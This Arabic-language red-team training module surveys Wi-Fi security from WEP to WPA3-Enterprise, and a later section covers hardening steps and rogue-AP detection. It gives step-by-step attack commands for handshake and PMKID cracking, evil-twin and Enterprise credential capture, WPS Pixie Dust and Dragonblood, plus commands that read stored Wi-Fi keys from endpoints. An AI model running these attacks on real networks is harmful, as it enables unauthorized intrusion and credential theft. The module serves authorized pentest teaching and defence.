الفرق الحمراء — الهجومخبير100mL34

Wi-Fi Deep Dive — اللي بيتكسر واللي صامد

WEP و WPA2 و WPA3 و Enterprise — الهجمات والحدود

#Wi-Fi#WPA3#PMKID#Evil Twin#EAP

ليه الـ Wi-Fi خاص؟

إنت في الشركة. الـ corp Wi-Fi شغّال. كل حاجة "محمية بـ password قوي".

طب الـ attacker قاعد في عربية في الشارع، عنده هوائي بـ 30 دولار.

هو بيشوف نفس الـ packets اللي بتشوفها. نفس الـ frames. نفس كل حاجة.

الفرق الوحيد: التشفير.

تشبيه — شرح مبسط

الكابل النحاسي زي ماسورة بتنقل مياه — محدش يقدر يوصلها إلا لما يفتح الحيطة. الـ Wi-Fi زي شبورة بتطلع من الشباك — كل اللي في الشارع، في العربية، في الشقة المجاورة، بيشمها. التشفير مش "حماية إضافية"، هو الحاجز الوحيد بين بياناتك وأي حد ماشي بهوائي. لو الحاجز ضعيف، يعني مفيش حاجز. - بس إحنا حاطين password قوي يا حضرتك؟؟ ها ها ها يا مستجد. الـ password القوي بيتكسر offline على RTX 4090 في يوم. اللي بيفرّق مش "قوته" بمقاييس IT، اللي بيفرّق هو طوله العشوائي وWPA3. اوعى تخلط.

حكاية: Evil Twin في مطار شيكاغو

في 2019، fed analysts من جهة كبيرة كانوا في travel. واحد فيهم اتصل بـ "OHARE-FREE-WIFI" — اللي مكنش الشبكة الرسمية للمطار. Rogue AP بـ captive portal. المهاجم خد credentials لـ corporate VPN. ومن هناك، اخترق internal network في 4 ساعات. الـ attacker كان قاعد في كافيه قدام gate. هوائي + Raspberry Pi. التكلفة: 200 دولار. الضرر: ملايين.

قانوني — استخدام مصرّح بيه بس

كل تكنيك تحت ده شرعي في الـ lab بتاعك أو جوه نطاق pentest موقّع. تهاجم شبكة الجار أو الكافيه أو شركة من غير ورق = جريمة تحت قوانين الجرائم المعلوماتية، حتى لو ما سرقتش حاجة. نقطة على السطر.

أنواع شبكات Wi-Fi و حالة كل واحدة في 2026

WEP (1999)

RC4 + IV قصيرة (24-bit). مكسور بالكامل — بيتكسر في أقل من 5 دقايق بأي كرت monitor mode.

دلوقتي بيظهر بس في طابعات قديمة، أجهزة ICS، أو أجهزة محدش حدّثها. وجوده لوحده مؤشر إن الصيانة عك.

WPA / TKIP (2003)

ترقيع لـ WEP. مكسور عن طريق Beck-Tews / chopchop. ما حدش بيستخدمه دلوقتي إلا بالغلط.

WPA2-PSK / AES-CCMP (2004)

القياس العام لعقدين. آمن من ناحية الخوارزمية، هش من ناحية الباسورد. كل الهجمات الحقيقية = كسر offline لـ handshake.

معرّض لـ KRACK (2017) — اتعالج بترقيعات client. هجوم PMKID (2018) — مش محتاج client أصلاً.

WPA2-Enterprise (EAP)

RADIUS + شهادة. أقوى بس الإعداد الغلط بيقتله: عميل ما بيفحصش شهادة الـ server → Evil Twin بياخد NetNTLM/MSCHAPv2 hashes.

WPA3-Personal / SAE (2018)

Dragonfly handshake — بيمنع الكسر offline نظرياً. كل محاولة محتاجة تفاعل مع AP حقيقي → forward secrecy.

ضربته ثغرات Dragonblood (CVE-2019-9494/9496) في الـ side-channel والـ downgrade. الترقيعات الحديثة قفلت معظمها.

WPA3-Enterprise + 192-bit suite

للقطاعات الحكومية/المالية. Suite-B + ECDH P-384 + AES-GCMP-256. مفيش هجمات عملية معروفة على الخوارزمية نفسها — بس على الإعداد والبشر.

OWE (Opportunistic Wireless Encryption)

بديل آمن للـ Open networks في الكافيهات. تشفير من غير باسورد عن طريق Diffie-Hellman. مش بيحمي من Evil Twin لأن مفيش مصادقة للـ AP.

WPS (PIN)

زرار أو PIN من 8 أرقام للاتصال السريع. بيتكسر في ساعات عن طريق Pixie Dust أو brute-force على الـ PIN. قفله دايماً، من غير تفكير.

عتاد المهاجم — ما تحتاجه فعلاً

كرت يدعم monitor mode + packet injection: Alfa AWUS036ACM (chipset MT7612U)، AWUS036ACH (RTL8812AU)، Panda PAU09.
هوائي اتجاهي (Yagi 16dBi) للمسافات البعيدة، أو omni للمسح المتعدد.
SDR اختياري (HackRF, BladeRF) للتحليل الأعمق والهجمات المخصصة.
GPU للـ cracking: hashcat على RTX 4090 بيكسر ~3M H/s لـ WPA2. الفرق بين فجر وأسبوع.
Pwnagotchi / WiFi Pineapple لجمع handshakes وإدارة AP خبيث.

bash

# تأكد البطاقة تدعم monitor + injection
iw list | grep -A 8 "Supported interface modes"
aireplay-ng --test wlan0mon

هجمات قابلة للتنفيذ اليوم — الخطوات

1) WPA2-PSK — handshake offline

bash

airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon
# في terminal آخر — إجبار client على إعادة الاتصال
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# تحويل و كسر
hcxpcapngtool -o cap.hc22000 cap-01.cap
hashcat -m 22000 cap.hc22000 rockyou.txt -r best64.rule

2) PMKID — بدون client

bash

hcxdumptool -i wlan0mon -o pmkid.pcapng \
  --enable_status=1
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng
hashcat -m 22000 pmkid.hc22000 wordlist.txt

يستهدف routers تنشر PMKID في أول EAPOL-frame. كثير منها معطّل اليوم لكن لا يزال يعمل ضد عتاد قديم.

3) Evil Twin + Captive Portal

bash

# AP مزيف بنفس SSID + إشارة أقوى + de-auth للـ AP الأصلي
airgeddon   # tui يقود السيناريو كاملاً
# أو يدوياً:
hostapd-mana hostapd.conf
dnsmasq -C dnsmasq.conf
# صفحة تطلب "إعادة إدخال كلمة سر Wi-Fi" — ضحايا غير تقنيين

4) WPA2-Enterprise — سرقة hashes

bash

# eaphammer ينشئ RADIUS مزيف
./eaphammer -i wlan0 --essid CORP-WIFI --bssid AA:BB:CC:DD:EE:FF \
  --auth wpa-eap --creds
# يلتقط MSCHAPv2 challenge/response
# ثم asleap أو hashcat -m 5500
hashcat -m 5500 ntlm.hash rockyou.txt

يعمل فقط لو client لا يفحص شهادة الـ RADIUS — وهي التهيئة الافتراضية في معظم الشبكات.

5) WPS — Pixie Dust

bash

reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv
# أو
bully -b AA:BB:CC:DD:EE:FF -d wlan0mon

6) WPA3 — downgrade & Dragonblood

bash

# لو الشبكة "transition mode" (WPA2/WPA3 معاً)
# أنشئ AP مزيف يدعم WPA2 فقط بنفس SSID → client يقع
# Dragonblood side-channel:
git clone https://github.com/vanhoefm/dragonblood
python dragondrain.py wlan0mon AA:BB:CC:DD:EE:FF

معظم الـ APs الحديثة رقّعت Dragonblood، لكن transition mode يبقى نقطة ضعف تصميمية.

ما لا يُكسر اليوم — حدود الواقع

لا يوجد طريق سحري

WPA3-SAE بكلمة سر طويلة (≥20 رمز عشوائي) — لا يمكن كسرها offline أصلاً (التصميم يمنع ذلك). الهجوم online ضد AP محدود السرعة → غير عملي.
WPA3-Enterprise 192-bit + شهادات client صحيحة (EAP-TLS) — لا توجد هجمات عملية معروفة. السرقة تكون من الـ endpoint لا من الراديو.
Wi-Fi 7 / 802.11be Protected Management Frames إجباري — يمنع de-auth الكلاسيكي → هجمات الـ handshake forced re-association لا تعمل.
RADIUS مع validated server certificate + identity hiding — Evil Twin يفشل لأن client يرفض الـ cert.
AES-GCMP-256 — لا يوجد كسر cryptographic معروف. كل الهجمات على الـ ecosystem المحيط.

طرق خفية / غير مباشرة (Workarounds)

عندما لا يمكن كسر الـ Wi-Fi مباشرة

المهاجم المحترف لا يضرب الجدار — يلفّ حوله. هذه الطرق التي تستخدمها مجموعات APT عندما يفشل الكسر المباشر:

هجوم BSSID Spoofing على الـ Probe Requests: الجهاز يبثّ باستمرار أسماء الشبكات التي يحفظها (PNL). استخدم Karma/MANA للرد بـ "نعم أنا تلك الشبكة" → يتصل تلقائياً.
سرقة الـ Pre-Shared Key من نقطة النهاية: على Windows في netsh wlan show profile name="X" key=clear؛ على Android من ملف /data/misc/wifi/WifiConfigStore.xml بصلاحية root.
هجوم سلسلة التوريد على الـ Router: استغلال CVE في firmware (Asus, TP-Link, Netgear) للوصول لـ admin ثم استخراج PSK من /etc/config/wireless.
Side-channel عبر الجدار: تحليل قوة الإشارة و توقيت الحزم يكشف نشاط بشري داخل المبنى — مفيد للـ reconnaissance قبل الاقتحام الفعلي.
RogueAP بمسمى GuestWiFi/Free-WiFi قرب الهدف: لا يحتاج اختراق شبكتهم — يكفي أن موظفاً واحداً يتصل بهاتفه و تخترق ذلك الهاتف، ثم تنتقل عبر VPN الشركة.
Bluetooth/UWB كقناة جانبية: نفس الجهاز يبثّ Bluetooth أيضاً. ثغرات BlueBorne / KNOB تعطي pivot دون لمس Wi-Fi.
هجمات Layer-2 بعد الانضمام كضيف: شبكات Wi-Fi كثيرة تفصل Guest/Corp بـ VLAN ضعيفة. yersinia + VLAN hopping + ARP spoofing داخل Guest قد تصل للـ Corp.
سرقة EAP credentials عبر phishing بريد قبل الوصول للموقع: سرقة username/password ثم الاتصال بـ Enterprise Wi-Fi شرعياً من الموقف خارج المبنى.
FragAttacks (CVE-2020-24588 و رفاقها): عيوب تصميم في 802.11 تسمح بحقن plaintext frames في شبكات مشفّرة. ترقّع تدريجياً لكن لا تزال تعمل ضد عتاد قديم.
هجوم الـ "Captive Portal Cookie": شبكات الفنادق و المطارات تعتمد cookie للسماح بالخروج. سرقتها من ضحية متصلة → دخول مباشر دون كلمة سر.

الحماية — كيف تجعل شبكتك ضمن «ما لا يُكسر»

تهيئة دفاعية مرجعية

WPA3-only (لا transition mode) أو WPA3-Enterprise + EAP-TLS لشبكات الموظفين.
Protected Management Frames إجباري (PMF required) — يقتل de-auth و disassoc spoofing.
كلمات سر ≥20 حرف عشوائي أو passphrase من ≥6 كلمات. لا تعتمد على complexity vs length.
عطّل WPS كلياً. لا استثناءات.
عطّل PMKID broadcast على الـ APs التي تدعم تعطيله.
RADIUS مع شهادة internal CA + إجبار client على فحص الشهادة (Group Policy على Windows، Profile على iOS/Android، NetworkManager على Linux).
اعزل Guest Wi-Fi في VLAN منفصل بـ ACL صريح يمنع كل الـ corp ranges.
WIDS/WIPS (Aruba, Cisco, Mist) لرصد APs مزيفة و de-auth floods.
تخفيض إشارة قصداً عند حدود المبنى — اضبط TX power بحيث لا تخرج للشارع.
MFA على كل خدمة داخلية — حتى لو كُسر الـ Wi-Fi لا يكفي للوصول للموارد.

مؤشرات Wi-Fi WIDS العملية

BSSID جديد ينشر نفس SSID — Evil Twin محتمل.
de-auth floods من client/AP غير مسجل.
RADIUS authentication failures من الـ same MAC بأنماط dictionary.
probe responses من APs لـ SSIDs غير معدّة في الموقع.
إشارة قوية بشكل غير معتاد من زاوية معينة من المبنى.

مصادر و قراءات

Mathy Vanhoef — KRACK, Dragonblood, FragAttacks papers.
Wi-Fi Alliance — WPA3 Specification.
NIST SP 800-153 — Wireless LAN Security Guidelines.
Aircrack-ng / hashcat / hcxtools docs.

غلطات الـ junior في الـ Wi-Fi

اللي بيكلّفك الشبكة كلها

WPA2-PSK مع password "Welcome2024" — handshake واحد + RTX 4090 = الـ password في 4 ساعات. والشبكة كلها بقت مفتوحة.
WPA2-Enterprise بدون certificate validation على الـ client — Evil Twin بياخد NetNTLM hashes في 30 ثانية. اللاب التوب الـ corporate بيـ auto-connect لـ AP بنفس الاسم.
Guest network على نفس VLAN — الـ visitor عنده access للـ printer، اللي عنده access للـ AD، اللي عنده credentials لـ DC. الـ chain كله من زائر شاي.
WPS مفعّل — Reaver / Pixie Dust بياخدهالك في دقايق. اقفله من الـ AP، مش بس "اخفي SSID".
"اخفاء SSID = أمان" — لأ. الـ SSID بيتنشر مع كل client بيـ probe. الـ attacker بيشوفه في 5 ثواني بـ airodump.
ما بيراقبش rogue APs — wireless IDS مش luxury. الـ attacker بيركّب AP في meeting room، الموظفين بيتصلوا بيه، خلاص.

الخلاصة الناشفة

الـ Wi-Fi شبورة في الشارع. أي حد عنده 30 دولار وهوائي بيقدر يسمع.

الفرق بين شبكة آمنة وشبكة مكشوفة = WPA3-Enterprise + EAP-TLS + certificate pinning + wireless monitoring.

الباقي إسعافات أولية.

وفي البيئات الحكومية الحساسة: الـ Wi-Fi مش option من الأصل. السيرفرات والـ admin workstations على كابل، بس وخلاص.

اكتبها على إيدك: لو الـ admin workstation على Wi-Fi، يبقى مفيش Wi-Fi، يبقى مفيش admin.

Network Protocol Attacks — البروتوكولات لما بتغدر بيك

الوحدة التالية

Active Directory Attacks — من جوّه بقى